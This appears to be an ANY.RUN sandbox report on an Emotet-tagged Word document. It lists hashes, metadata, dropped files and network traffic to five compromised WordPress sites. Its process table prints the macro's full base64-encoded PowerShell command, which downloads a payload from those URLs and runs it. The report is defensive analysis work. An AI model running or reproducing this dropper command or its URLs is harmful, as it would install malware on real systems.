analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

032019-HX753951-268.doc

Full analysis: https://app.any.run/tasks/0498c38b-b5db-4dc5-8a08-086c1d363407
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 22, 2019, 08:49:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Mar 22 07:55:00 2019, Last Saved Time/Date: Fri Mar 22 07:55:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 12, Security: 0
MD5:

C41AD86D058BC2EBDB2D4966ABD3187B

SHA1:

B6DB0FE4BA0C8AAD4E67E00ECDA670CD7AE0D2CB

SHA256:

4E2856D5AACCD5931755A1B092EE0302FFFC2223A91DFD1FFAB2D49A67DA8D53

SSDEEP:

3072:w77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qzCpbzHORSvrlu0fFec49W:w77HUUUUUUUUUUUUUUUUUUUT52V3BbOa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1088)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 604)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 604)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:03:22 07:55:00
ModifyDate: 2019:03:22 07:55:00
Pages: 1
Words: 1
Characters: 12
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 12
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
33
Monitored processes
2
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
604"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\032019-HX753951-268.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1088powershell -e JABBAEIAQQBBAEQAMQBVAEcAPQAoACcASABVAFoAJwArACcAQQBVAEEAQQBYACcAKQA7ACQAQgBBAEEAQQBDAFoAQQA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQARgBVAEQAeAB3AFUARABBAD0AKAAnAGgAdAAnACsAJwB0AHAAOgAvAC8AZgAnACsAJwByAGEAbgBvAHMAYgAnACsAJwBhACcAKwAnAHIAJwArACcAYgBlACcAKwAnAHIAcwBoAG8AcAAuACcAKwAnAGMAJwArACcAbwBtAC8AJwArACcAdwBwAC0AYwAnACsAJwBvAG4AJwArACcAdABlAG4AdAAvAHAAbAAnACsAJwB1ACcAKwAnAGcAaQBuAHMALwAnACsAJwBJAFUAaAAnACsAJwAxACcAKwAnAC8AQABoACcAKwAnAHQAdAAnACsAJwBwADoAJwArACcALwAvAGEAcgB0AG0AJwArACcAaQBrACcAKwAnAGgAYQBsAGMAJwArACcAaAB5AGsAJwArACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACsAJwAtAGkAbgAnACsAJwBjAGwAJwArACcAdQBkAGUAcwAnACsAJwAvACcAKwAnAG0AWQBXADMALwAnACsAJwBAAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AYQByACcAKwAnAGUAeABjAGEAcgAnACsAJwBnAG8AJwArACcALgBjAG8AbQAvAHcAcAAnACsAJwAtAGkAbgBjAGwAdQBkAGUAJwArACcAcwAvAFEAQgAnACsAJwBjAGkALwBAAGgAdAB0AHAAOgAvACcAKwAnAC8AdQBpACcAKwAnAHQAYwBzAC4AJwArACcAYQAnACsAJwBjAG0ALgAnACsAJwBvACcAKwAnAHIAZwAvAHcAcAAtACcAKwAnAGMAbwBuAHQAZQBuAHQALwAnACsAJwBmAHEAUwBsACcAKwAnAHQALwAnACsAJwBAACcAKwAnAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AJwArACcAYQBsACcAKwAnAHQAYQAnACsAJwByAGYAeAAuAGMAJwArACcAbwBtAC8AdwBvACcAKwAnAHIAJwArACcAZABwAHIAZQAnACsAJwBzACcAKwAnAHMALwB3AFEAWQB0ACcAKwAnAC8AJwApAC4AKAAnAFMAcABsACcAKwAnAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAGMAWABBAFgAYwBBAD0AKAAnAG0AUQBfACcAKwAnAF8AeAAnACsAJwBRAEcAVQAnACkAOwAkAGgAdwBrAEMARABVACAAPQAgACgAJwAzACcAKwAnADUANwAnACkAOwAkAGkARABYAEQAQQBBAEcAUQA9ACgAJwBRAHgAQQBfAFgAQQAnACsAJwBBACcAKwAnAEEAJwApADsAJAB0AFEAQgBBAEMAQQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAaAB3AGsAQwBEAFUAKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABaAEIAbwBRAEEAVQBRAFUAIABpAG4AIAAkAEYAVQBEAHgAdwBVAEQAQQApAHsAdAByAHkAewAkAEIAQQBBAEEAQwBaAEEALgAoACcARABvAHcAbgBsAG8AYQBkACcAKwAnAEYAaQBsACcAKwAnAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAFoAQgBvAFEAQQBVAFEAVQAsACAAJAB0AFEAQgBBAEMAQQApADsAJABBAGsAQgBBAFEAQQBHAEcAPQAoACcAawAnACsAJwBfAEEAWgBBAEEAJwArACcARAAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAdABRAEIAQQBDAEEAKQAuACIAbABFAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsALgAoACcASQAnACsAJwBuAHYAJwArACcAbwBrAGUALQBJAHQAJwArACcAZQBtACcAKQAgACQAdABRAEIAQQBDAEEAOwAkAFAAQQBBAG8AeABBAFEAQgA9ACgAJwBNAG8AbwAnACsAJwBYAFgAVQAnACsAJwBaAHcAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHIAdwBjAEIARwBrAEIAPQAoACcASABDACcAKwAnAEMAQQBBAG8AWgAnACkAOwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 343
Read events
880
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
604WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8469.tmp.cvr
MD5:
SHA256:
1088powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XTL5UUSZG7UU34TQ2AW9.temp
MD5:
SHA256:
604WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:A3D37A96BE99E1B37F142EAB31105E77
SHA256:10776DED098C89C43628A733533878C3854AA3666210F1501E5D0D74311EF8F0
1088powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9254.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
604WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$2019-HX753951-268.docpgc
MD5:6BC77955D9CE23E6BB870C5B83448495
SHA256:680A01416B07A7E96A1DD9E1EE25C1A25AC3FE7EC15BCA0F857FB4E373939EEC
604WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:B9D35E6B490B2F355074CB9EF209238F
SHA256:A64E3419C38271EEFBADD09C0D0F30E7993217D40C5136758B384CA49FF31604
1088powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1088
powershell.exe
GET
404
89.184.94.112:80
http://artmikhalchyk.com/wp-includes/mYW3/
UA
xml
345 b
suspicious
1088
powershell.exe
GET
404
171.22.26.34:80
http://arexcargo.com/wp-includes/QBci/
GB
xml
345 b
suspicious
1088
powershell.exe
GET
404
167.99.187.243:80
http://franosbarbershop.com/wp-content/plugins/IUh1/
US
xml
345 b
suspicious
1088
powershell.exe
GET
404
162.254.252.104:80
http://uitcs.acm.org/wp-content/fqSlt/
US
xml
345 b
suspicious
1088
powershell.exe
GET
404
64.41.83.139:80
http://altarfx.com/wordpress/wQYt/
US
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1088
powershell.exe
167.99.187.243:80
franosbarbershop.com
US
suspicious
1088
powershell.exe
171.22.26.34:80
arexcargo.com
GB
suspicious
1088
powershell.exe
89.184.94.112:80
artmikhalchyk.com
Internet Invest Ltd.
UA
suspicious
1088
powershell.exe
162.254.252.104:80
uitcs.acm.org
A2 Hosting, Inc.
US
suspicious
1088
powershell.exe
64.41.83.139:80
altarfx.com
Affinity Internet, Inc
US
malicious

DNS requests

Domain
IP
Reputation
franosbarbershop.com
  • 167.99.187.243
suspicious
artmikhalchyk.com
  • 89.184.94.112
suspicious
arexcargo.com
  • 171.22.26.34
suspicious
uitcs.acm.org
  • 162.254.252.104
suspicious
altarfx.com
  • 64.41.83.139
malicious

Threats

No threats detected
No debug info